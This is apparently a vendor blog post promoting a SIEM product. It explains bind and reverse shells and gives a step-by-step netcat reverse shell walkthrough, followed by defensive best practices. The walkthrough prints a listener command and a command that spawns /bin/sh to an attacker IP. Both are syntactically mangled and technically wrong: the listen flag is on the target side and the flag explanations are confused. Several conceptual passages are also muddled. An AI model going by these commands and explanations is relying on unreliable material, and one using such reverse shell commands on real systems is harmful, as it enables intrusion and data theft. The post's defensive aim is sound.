Decoding reverse shell attacks

The recent Log4j vulnerability left several companies reeling as developers and security professionals scrambled to patch systems and mitigate the damage done. A key feature of the attacks was the use of reverse shell. Reverse shell is a process attackers use to gain access to remote systems and exploit remote code execution (RCE) vulnerabilities present in these systems.

Before we explore reverse shell, we need to establish what bind shell is.

What is bind shell?

Bind shell is a process used by pen testers and attackers to connect to remote systems and transmit data. To do this, they need two kinds of systems: an initiator (client) and a listener (server).

Let us say the initiator is being operated by the attacker and the listener is the target or victim system that has an RCE vulnerability. In this case, as shown in the image below, the attacker sends a connection request with the payload and a command to execute shell code to a specific port on the listener. This process binds the port of the listener to the initiator, hence the name bind shell.

Upon receiving and accepting the connection request, the listener executes the shell code, leading to the data being transmitted to the initiator system. Through this code, attackers can further extract data or gain access to other systems connected to the same network.

While bind shell is simple enough to execute, it does carry some disadvantages for the attacker. An organization can safeguard against bind shell in the following ways:

• Firewalls: Since bind shell uses a TCP or UDP port to access the victim's systems, firewalls can be configured to stop taking in requests at that particular port.
• NAT or PAT: Network Address Translation (NAT) and Port Address Translation (PAT) are ways to map various private addresses to public addresses in a router. Since the payload sent during a bind shell attack contains the private IP address and the specific port number of the victim's system, it cannot be sent to a public IP address or port because they may change.

In order to avoid these obstacles, attackers resort to reverse shell.

What is reverse shell?

As the name suggests, in a reverse shell attack, the attacker operates as the listener and the victim as the initiator. In this process, the attacker looks out for initiators that send out remote connection requests for a specific port and forces them to connect to the listener.

Once the connection occurs, the listener executes malicious shell code in the initiator's system, and the data is transmitted and presented in the listener's system. Since it is the server that has initiated the request, reverse shell can sidestep firewalls and overcome the problems posed by PAT and NAT.

How does the connection occur?

Executing a reverse shall attack requires the initiation and establishment of a remote connection between the initiator and listener. This is often done using open-source software called Netcat (NC).

NC is a popular back-end network testing and exploration tool used for testing connections using the TCP or UDP protocols and for scanning and listening to ports. Since most pen testers and attackers use this tool to carry out shell commands in target systems, it is frequently referred to as the Swiss Army Knife of networking. Alternatives to NC depend on the shell script, like PHP, Perl, or Bash, used in the target system.

Executing a reverse shell attack using NC

1. 1. Identify an attack vector: To execute a reverse shell attack using NC, the cybercriminal first looks for a possible attack vector. One way to do this is to perform a ping sweep of a website to get a list of IP addresses or domains.
2. 2. Check for connectivity and identify possible vulnerabilities: The next step is to check which of the systems they can connect to. Once a connection has been established, the cybercriminal looks for possible vulnerabilities to exploit.
3. 3. Open a listener in the local system using NC: If NC is installed in the system connected to the web server, it can be used to spawn a shell command in the target system. First, the cybercriminal needs to open a listener in the local system using the following command.

   nc - lvp- 7879

   Here, nc stands for Netcat, l for listener (the local/attacker's system), v for verbosity (which will help get more details about the target system), and p for port number. This is followed by the port number to which the cybercriminal wants to connect.

4. 4. Append a command to spawn a shell command in the target system: The cybercriminal then executes the following command in the ping utility of the target system (the web server), asking it to connect to the local machine.

   nc-lvp-7879-198.172.1.100-e/bin/sh

   Here, the previous command is followed by the IP address of the local system or listener along with:

   • e for execute a command.
   • bin for binary file.
   • sh for shell.
5. 5. Execute commands to gain access or transmit data: The target system or server then spawns the command and establishes a connection with the local system. Once the connection is established, the criminal can execute shell commands to transmit data from the web server or even use it to gain further access to other systems connected to the network.

Best practices to prevent reverse shell attacks

While remote shell connections can be set up for administrative purposes as well, a lot of attackers use them for malicious purposes. Once an attacker gains the ability to execute shell commands on a server, they also gain the ability to take it over and access any other system in the network. To prevent this from happening, here are some industry-recommended best practices:

• Track all outgoing connections happening through TCP and UDP ports.
• Strengthen outbound firewall policies to filter out requests sent to dangerous websites.
• Regularly patch applications and check for command injection vulnerabilities that can be used to carry out reverse shell attacks.
• Frequently monitor network activity to weed out suspicious command executions.

A SIEM solution like Log360 continuously monitors network activity, keeps an eye out for suspicious command executions, and regularly ingests logs from vulnerability scanners to ensure you are immediately notified of any loopholes left unattended. To learn more, get in touch with our product experts for a personalized demo. You can also download a free, 30-day trial version here.